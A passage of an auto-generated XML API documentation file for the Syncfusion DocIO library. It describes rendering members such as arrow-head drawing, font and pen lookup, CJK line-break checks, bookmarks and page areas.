        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawArrowHead(Syncfusion.DocIO.DLS.Shape,System.Drawing.Pen,System.Drawing.RectangleF,System.Boolean@,System.Drawing.Drawing2D.GraphicsPath@,System.Drawing.PointF[])">
            <summary>
            Draws the arrow head.
            </summary>
            <param name="shape">The shape.</param>
            <param name="pen">The pen.</param>
            <param name="bounds">The bounds.</param>
            <param name="isArrowHeadExist">if set to <c>true</c> [is arrow head exist].</param>
            <param name="path">The path.</param>
            <param name="linePoints">The line points1.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawCloseEndArrowHead(Syncfusion.DocIO.DLS.Shape,System.Drawing.Pen,System.Drawing.RectangleF,System.Drawing.PointF[],System.Drawing.PointF@,System.Boolean@,System.Drawing.Drawing2D.GraphicsPath@)">
            <summary>
            Draws the close end arrow head.
            </summary>
            <param name="shape">The shape.</param>
            <param name="pen">The pen.</param>
            <param name="bounds">The bounds.</param>
            <param name="linePoints">The line points.</param>
            <param name="endPoint">The end point.</param>
            <param name="isArrowHeadExist">if set to <c>true</c> [is arrow head exist].</param>
            <param name="path">The path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawOpenBeginArrowHead(Syncfusion.DocIO.DLS.Shape,System.Drawing.Pen,System.Drawing.RectangleF,System.Drawing.PointF[],System.Drawing.PointF@,System.Boolean@,System.Drawing.Drawing2D.GraphicsPath@)">
            <summary>
            Draws the open begin arrow head.
            </summary>
            <param name="shape">The shape.</param>
            <param name="pen">The pen.</param>
            <param name="bounds">The bounds.</param>
            <param name="linePoints">The line points.</param>
            <param name="endPoint">The end point.</param>
            <param name="isArrowHeadExist">if set to <c>true</c> [is arrow head exist].</param>
            <param name="path">The path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawCloseBeginArrowHead(Syncfusion.DocIO.DLS.Shape,System.Drawing.Pen,System.Drawing.RectangleF,System.Drawing.PointF[],System.Drawing.PointF@,System.Boolean@,System.Drawing.Drawing2D.GraphicsPath@)">
            <summary>
            Draws the close begin arrow head.
            </summary>
            <param name="shape">The shape.</param>
            <param name="pen">The pen.</param>
            <param name="bounds">The bounds.</param>
            <param name="linePoints">The line points.</param>
            <param name="endPoint">The end point.</param>
            <param name="isArrowHeadExist">if set to <c>true</c> [is arrow head exist].</param>
            <param name="path">The path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.AddCloseArrowHeadPoints(System.Drawing.PointF[],System.Drawing.Drawing2D.GraphicsPath@,System.Drawing.Pen)">
            <summary>
            Adds the close arrow head points.
            </summary>
            <param name="points">The points.</param>
            <param name="path">The path.</param>
            <param name="pen">The pen.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.AddOpenArrowHeadPoints(System.Drawing.PointF[],System.Drawing.Drawing2D.GraphicsPath@)">
            <summary>
            Adds the open arrow head points.
            </summary>
            <param name="points">The points.</param>
            <param name="path">The path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetOpenArrowDefaultValues(Syncfusion.DocIO.DLS.Shape,System.Single,System.Single@,System.Single@,System.Single@,System.Boolean)">
            <summary>
            Gets the open arrow default values.
            </summary>
            <param name="shape">The shape.</param>
            <param name="lineWidth">Width of the line.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
            <param name="isFromBeginArrow">if set to <c>true</c> [is from begin arrow].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetCloseArrowDefaultValues(Syncfusion.DocIO.DLS.Shape,System.Single,System.Single@,System.Single@,System.Single@,System.Boolean)">
            <summary>
            Gets the close arrow default values.
            </summary>
            <param name="shape">The shape.</param>
            <param name="lineWidth">Width of the line.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
            <param name="isFromBeginArrow">if set to <c>true</c> [is from begin arrow].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetArrowHeadLength(Syncfusion.DocIO.DLS.Shape,System.Boolean)">
            <summary>
            Gets the length of the arrow head.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetCloseNarrowArrowDefaultValues(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineEndLength,System.Single,System.Single@,System.Single@,System.Single@)">
            <summary>
            Gets the close narrow arrow default values.
            </summary>
            <param name="arrowHeadLength">Length of the arrow head.</param>
            <param name="lineWidth">Width of the line.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetCloseMediumArrowDefaultValues(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineEndLength,System.Single,System.Single@,System.Single@,System.Single@)">
            <summary>
            Gets the close medium arrow default values.
            </summary>
            <param name="arrowHeadLength">Length of the arrow head.</param>
            <param name="lineWidth">Width of the line.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetCloseWideArrowDefaultValues(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineEndLength,System.Single,System.Single@,System.Single@,System.Single@)">
            <summary>
            Gets the close wide arrow default values.
            </summary>
            <param name="arrowHeadLength">Length of the arrow head.</param>
            <param name="lineWidth">Width of the line.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetOpenNarrowArrowDefaultValues(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineEndLength,System.Single,System.Single@,System.Single@,System.Single@)">
            <summary>
            Gets the open narrow arrow default values.
            </summary>
            <param name="arrowHeadLength">Length of the arrow head.</param>
            <param name="lineWidth">Width of the line.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetOpenMediumArrowDefaultValues(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineEndLength,System.Single,System.Single@,System.Single@,System.Single@)">
            <summary>
            Gets the open medium arrow default values.
            </summary>
            <param name="arrowHeadLength">Length of the arrow head.</param>
            <param name="lineWidth">Width of the line.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetOpenWideArrowDefaultValues(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineEndLength,System.Single,System.Single@,System.Single@,System.Single@)">
            <summary>
            Gets the open wide arrow default values.
            </summary>
            <param name="arrowHeadLength">Length of the arrow head.</param>
            <param name="lineWidth">Width of the line.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FindAngleToLeftAndRightHeadPoint(Syncfusion.DocIO.DLS.Shape,System.Drawing.PointF,System.Drawing.PointF,System.Boolean)">
            <summary>
            Finds the angle to left and right head point.
            </summary>
            <param name="shape">The shape.</param>
            <param name="point1">The point1.</param>
            <param name="point2">The point2.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FindArrowHeadAngleRadians(System.Drawing.PointF,System.Drawing.PointF,System.Boolean)">
            <summary>
            Finds the arrow head angle radians.
            </summary>
            <param name="point1">The point1.</param>
            <param name="point2">The point2.</param>
            <param name="isFromSeparateOrientation">if set to <c>true</c> [is from separate orientation].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FindBaseLineEndPoint(Syncfusion.DocIO.DLS.Shape,System.Drawing.PointF[],System.Single,System.Boolean)">
            <summary>
            Finds the base line end point.
            </summary>
            <param name="shape">The shape.</param>
            <param name="linePoints">The line points.</param>
            <param name="adjustValue">The adjust value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetEndPointForBaseLine(System.Boolean,System.Double,System.Double,System.Single,System.Drawing.PointF[],System.Single@,System.Single@)">
            <summary>
            Gets the end point.
            </summary>
            <param name="isFromBeginArrow">if set to <c>true</c> [is from begin arrow].</param>
            <param name="degree">The degree.</param>
            <param name="length">The length.</param>
            <param name="adjustValue">The adjust value.</param>
            <param name="linePoints">The line points.</param>
            <param name="x">The x.</param>
            <param name="y">The y.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FindAngleRadians(System.Drawing.PointF[],System.Boolean)">
            <summary>
            Finds the angle radians.
            </summary>
            <param name="linePoints">The line points.</param>
            <param name="isFromBottomToTop">if set to <c>true</c> [is from bottom to top].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FindArrowHeadPoints(Syncfusion.DocIO.DLS.Shape,System.Drawing.Pen,System.Drawing.RectangleF,System.Drawing.PointF[],System.Boolean,System.Boolean)">
            <summary>
            Finds the end cap arrow head points.
            </summary>
            <param name="shape">The shape.</param>
            <param name="pen">The pen.</param>
            <param name="bounds">The bounds.</param>
            <param name="linePoints">The line points.</param>
            <param name="isFromOpenArrow">if set to <c>true</c> [is from open arrow].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.FindLeftRightHeadPoints(Syncfusion.DocIO.DLS.Shape,System.Drawing.PointF[],System.Drawing.PointF[]@,System.Single,System.Single,System.Boolean)">
            <summary>
            Finds the left right head points.
            </summary>
            <param name="shape">The shape.</param>
            <param name="linePoints">The line points.</param>
            <param name="points">The points.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="isFromBeginArrow">if set to <c>true</c> [is from begin arrow].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.ConstrucBasetLine(System.Boolean,System.Drawing.PointF,System.Drawing.PointF[],System.Drawing.PointF@,System.Drawing.PointF@)">
            <summary>
            Construcs the baset line.
            </summary>
            <param name="isFromBeginArrow">if set to <c>true</c> [is from begin arrow].</param>
            <param name="points">The points.</param>
            <param name="linePoints">The line points.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetArrowDefaultValues(Syncfusion.DocIO.DLS.Shape,System.Drawing.Pen,System.Single@,System.Single@,System.Single@,System.Boolean,System.Boolean)">
            <summary>
            Gets the arrow default values.
            </summary>
            <param name="shape">The shape.</param>
            <param name="pen">The pen.</param>
            <param name="arrowLength">Length of the arrow.</param>
            <param name="arrowAngle">The arrow angle.</param>
            <param name="adjustValue">The adjust value.</param>
            <param name="isFromBeginArrow">if set to <c>true</c> [is from begin arrow].</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.RadianToDegree(System.Double)">
            <summary>
            Radians to degree.
            </summary>
            <param name="angle">The angle.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Degree2Radian(System.Double)">
            <summary>
            Degree2s the radian.
            </summary>
            <param name="a">A.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetEndPoint(System.Double,System.Single,System.Single,System.Single,System.Single@,System.Single@)">
            <summary>
            Gets the end point.
            </summary>
            <param name="angle">The angle.</param>
            <param name="len">The length.</param>
            <param name="start_x">The start_x.</param>
            <param name="start_y">The start_y.</param>
            <param name="end_x">The end_x.</param>
            <param name="end_y">The end_y.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLinePointsBasedOnFlip(Syncfusion.DocIO.DLS.Shape,System.Drawing.RectangleF)">
            <summary>
            Gets the line points based on flip.
            </summary>
            <param name="shape">The shape.</param>
            <param name="bounds">The bounds.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsSoftHyphen(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Determines whether the text range is soft hyphen and that need to be drawn.
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetStringFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Gets the string format.
            </summary>
            <param name="charFormat">The char format.</param>
            <param name="paraFormat">The para format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetBrush(System.Drawing.Color)">
            <summary>
            Gets the brush.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetTextColor(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Gets the color of the text.
            </summary>
            <param name="charFormat">The char format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateAlternateFont(Syncfusion.DocIO.DLS.WCharacterFormat,System.String,System.Drawing.Font@)">
            <summary>
            Updates the alternate font for the font not installed in the system.
            </summary>
            <param name="charFormat">The char format.</param>
            <param name="fontName">Name of the font.</param>
            <param name="font">The font.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsTOC(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Checks the owner paragraph of the textrange is a TOC
            </summary>
            <param name="txtRange">Text Range</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetFont(Syncfusion.DocIO.DLS.WCharacterFormat,System.String)">
            <summary>
            Gets the font.
            </summary>
            <param name="charFormat">The char format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetStringAlignment(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Gets the string alignment.
            </summary>
            <param name="paraFormat">The para format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetPen(Syncfusion.DocIO.DLS.Border,System.Boolean)">
            <summary>
            Gets the pen.
            </summary>
            <param name="border">The border.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetPen(Syncfusion.DocIO.DLS.BorderStyle,System.Single,System.Drawing.Color)">
            <summary>
            Gets the pen.
            </summary>
            <param name="borderType">Type of the border.</param>
            <param name="borderLineWidth">Width of the border line.</param>
            <param name="borderColor">Color of the border.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.ScaleImage(System.Drawing.Image,System.Single,System.Single)">
            <summary>
            Scales the image.
            </summary>
            <param name="image">The image.</param>
            <param name="width">The width.</param>
            <param name="height">The height.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.AddBookmarkCrossRef(System.Drawing.RectangleF)">
            <summary>
            Adds Bookmark cross reference field to the collection.
            </summary>
            <param name="bounds">The bounds.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.AddHyperLink(Syncfusion.DocIO.DLS.Hyperlink,System.Drawing.RectangleF)">
            <summary>
            Adds the hyper link to collection.
            </summary>
            <param name="text">The text.</param>
            <param name="bounds">The bounds.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateTOCLevel(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.BookmarkHyperlink)">
            <summary>
            Updates the TOC level.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="bookmark">The bookmark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateResIndex(System.String,Syncfusion.Layouting.ITextMeasurable,System.Int32,System.Boolean,System.Boolean,System.Double,System.Single,System.Single,System.Boolean)">
            <summary>
            Updates Result index
            </summary>
            <param name="text">text</param>
            <param name="measurer">the measurer</param>
            <param name="wordLength">Word length</param>
            <param name="resIndex">res index</param>
            <param name="bSplitByChar">bSplitByChar</param>
            <param name="bIsInCell">bIsInCell</param>
            <param name="offset">offset</param>
            <param name="clientWidth">Client Width</param>
            <returns>res Index</returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsLeadingCharacter(System.Char)">
            <summary>
            Determine whether the character is CJK leading character
            A line of text cannot end with any leading characters, which are listed below
            </summary>
            <param name="c"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsBeginCharacter(System.Char)">
            <summary>
            Determine whether the character is Begin CJK character
            A line of text cannot begin with any following characters
            </summary>
            <param name="c"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsOverFlowCharacter(System.Char)">
            <summary>
            Determine whether the character is CJK overflow character
            Overflow characters are allowed to render in the same line when it doesn't have required client width to fit the character
            </summary>
            <param name="c"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsUnicodeText(System.String)">
            <summary>
            
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetPreviousSibling(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Get previous text range
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetCellWidth(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Get cell Width
            </summary>
            <param name="textRange">The TextRange</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsUnicode(System.String)">
            <summary>
            Determines whether the text is unicode
            </summary>
            <param name="text">text</param>
            <returns>
            	<c>true</c> if text is unicode, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetWordLength(System.String,System.Int32)">
            <summary>
            Gets length of WORD.
            NOTE:
            - WORD: text run that finished by last space letter 
              (sample: "text  " or "  "; wrong sample: " text" or "text  text" )
            EXCLUSION:
            - If text working part have zero symbols return (-1)
            - If text working part don't consist SPACE letters return legth of 
              text working part
            </summary>
            <param name="text"></param>
            <param name="startIndex">Index of word first letter</param>
            <returns>Length of found word</returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawBehindWidgets(Syncfusion.Layouting.LayoutedWidgetList,Syncfusion.Layouting.IWidget,System.Int32,System.Boolean)">
            <summary>
            Draws the behind shape widgets.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetOrderIndex(Syncfusion.Layouting.IWidget)">
            <summary>
            Get Order index of the floating item
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLineWidth(Syncfusion.DocIO.ReaderWriter.Biff_Records.BorderCode)">
            <summary>
            Get the line width of the picture border for Inline picture shape
            </summary>
            <param name="border"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLineWidth(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Get the line width of the picture border
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.IsListCharacter">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.IsClipBoundsNeedToBeUpdated">
            <summary>
            Determine whether the Clip bounds need to be updated based on owner bounds
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.IsTextBoxBoundsNeedToBeUpdated">
            <summary>
            Determines whether the Clip bounds need to be updated based on text box bounds
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.CurrentBookmarkName">
            <summary>
            Get the Current Bookmark name
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.Graphics">
            <summary>
            Gets or sets the graphics.
            </summary>
            <value>The graphics.</value>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.GraphicsBmp">
            <summary>
            Gets the bitmap graphics.
            </summary>
            <value> The graphics.</value>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.Hyperlinks">
            <summary>
            Gets the hyperlinks.
            </summary>
            <value>The hyperlinks.</value>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.BookmarkHyperlinksList">
            <summary>
            Gets the bookmark hyperlinks list.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.Bookmarks">
            <summary>
            Gets the bookmarks.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.OverLappedShapeWidgets">
            <summary>
            Gets the overlapping shape widgets.
            </summary>
            <value>The overlapping shape widgets.</value>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.FontMetric">
            <summary>
            Gets the font metric.
            </summary>
            <value>
            The font metric.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.StringFormt">
            <summary>
            Gets the string formt.
            </summary>
            <value>
            The string formt.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.TextBoxBounds">
            <summary>
            Gets or sets the Text box bounds
            </summary>
            <value>
            The Text box bounds
            </value>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DefaultBorders.#ctor(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            
            </summary>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DefaultBorders.InitBorder(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border)">
            <summary>
            
            </summary>
            <param name="destination"></param>
            <param name="sourse"></param>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.DefaultBorders.Vertical">
            <summary>
            Gets the vertical border
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.DrawingContext.DefaultBorders.Horizontal">
            <summary>
            Gets / sets the horizontal border
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.BookmarkPosition.#ctor(System.String,System.Int32,System.Drawing.RectangleF)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.Rendering.BookmarkPosition"/> class.
            </summary>
            <param name="bookmarkName">Name of the bookmark.</param>
            <param name="pageNumber">The page number.</param>
            <param name="bounds">The bounds.</param>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.BookmarkPosition.Bounds">
            <summary>
            Gets or sets the bounds.
            </summary>
            <value>The bounds.</value>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.BookmarkPosition.PageNumber">
            <summary>
            Gets or sets the page number.
            </summary>
            <value>The page number.</value>
        </member>
        <member name="P:Syncfusion.DocIO.Rendering.BookmarkPosition.BookmarkName">
            <summary>
            Gets or sets the name of the bookmark.
            </summary>
            <value>The name of the bookmark.</value>
        </member>
        <member name="T:Syncfusion.DocIO.Rendering.SortByColorBrightness">
            <summary>
            Sort the border rendering order based on its color brightness order
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Rendering.Page">
            <summary>
            Represents a page.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.#ctor(Syncfusion.DocIO.DLS.IWSection,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Rendering.Page"/> class.
            </summary>
            <param name="section">The section.</param>
            <param name="iNumber">The i number.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.IsEmptyWaterMark(Syncfusion.DocIO.DLS.Watermark)">
            <summary>
            Checks the current watermark is empty watermark or not.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.IsWaterMarkNeedToBeDraw">
            <summary>
            Checks the HeaderFooter Paragraph and Table Weather WaterMark has to draw first
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.IsWaterMarkInParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Checks the paragraph weather watermark in Paragraph
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.IsWaterMarkOrderHasChanged(System.Int32,System.Boolean)">
            <summary>
            Checks which One has to draw first watermark or picture,shape,textbox
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.IsWaterMarkInTable(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Checks the paragraph weather watermark in Table
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.UpdateFieldsNumPages(System.Int32)">
            <summary>
            
            </summary>
            <param name="numPages"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.AddCachedFields(Syncfusion.DocIO.DLS.IWField)">
            <summary>
            
            </summary>
            <param name="field"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.GetHeaderArea">
            <summary>
            Gets the header area.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.GetFooterArea">
            <summary>
            Gets the footer area.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.GetColumnArea(Syncfusion.DocIO.DLS.Column,System.Single)">
            <summary>
            Gets the column area.
            </summary>
            <param name="column">The column.</param>
            <param name="prevWidth">Width of the prev.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.GetColumnArea(System.Int32,System.Single@)">
            <summary>
            Gets the column area.
            </summary>
            <param name="columnIndex">Index of the column.</param>
            <param name="prevColumnsWidth">Width of the prev columns.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.GetSectionArea(Syncfusion.DocIO.DLS.Column,System.Single)">
            <summary>
            Gets the section area.
            </summary>
            <param name="column">The column.</param>
            <param name="prevWidth">Width of the prev.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.Page.GetSectionArea(System.Int32,System.Single@,System.Boolean,System.Boolean)">
            <summary>
            Gets the section area.
            </summary>
            <param name="columnIndex">Index of the column.</param>
            <param name="prevColumnsWidth">Width of the prev columns.</param>
            <param name="isNextSection">isNextSection.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.PageWidgets">
            <summary>
            Collection of lay outed widget.
            </summary>
            <value>The page widgets.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.DocSection">
            <summary>
            Gets the page document sections.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.BackgroundImage">
            <summary>
            Gets the back ground images of the page.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.BackgroundColor">
            <summary>
            Gets the document back ground color.
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.DLS.Rendering.Page.FootnoteWidgets" -->
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.EndnoteWidgets">
            <summary>
            Collection of Endnote layouted widget.
            </summary>
            <value>The Endnote widgets.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.BehindWidgets">
            <summary>
            Gets the Collection of BehindWidgets in the page
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.EndNoteSectionIndex">
            <summary>
             Collection for section id's of End note Widgets.
             </summary>
             <value>The Section's ID's.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.FootNoteSectionIndex">
            <summary>
             Collection for section id's of Foot note Widgets.
             </summary>
             <value>The Section's ID's.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.Setup">
            <summary>
            Gets page Setup info.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.Number">
            <summary>
            Gets page number.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.NumberOfBehindWidgetsInHeader">
            <summary>
            Get the number of Behind widgets in header
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.Page.NumberOfBehindWidgetsInFooter">
            <summary>
            Get the number of Behind widgets in footer
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Rendering.PageCollection">
            <summary>
            Represents a collection of pages
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.PageCollection.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Rendering.PageCollection"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.WordToPDFResult.#ctor">
            <summary>
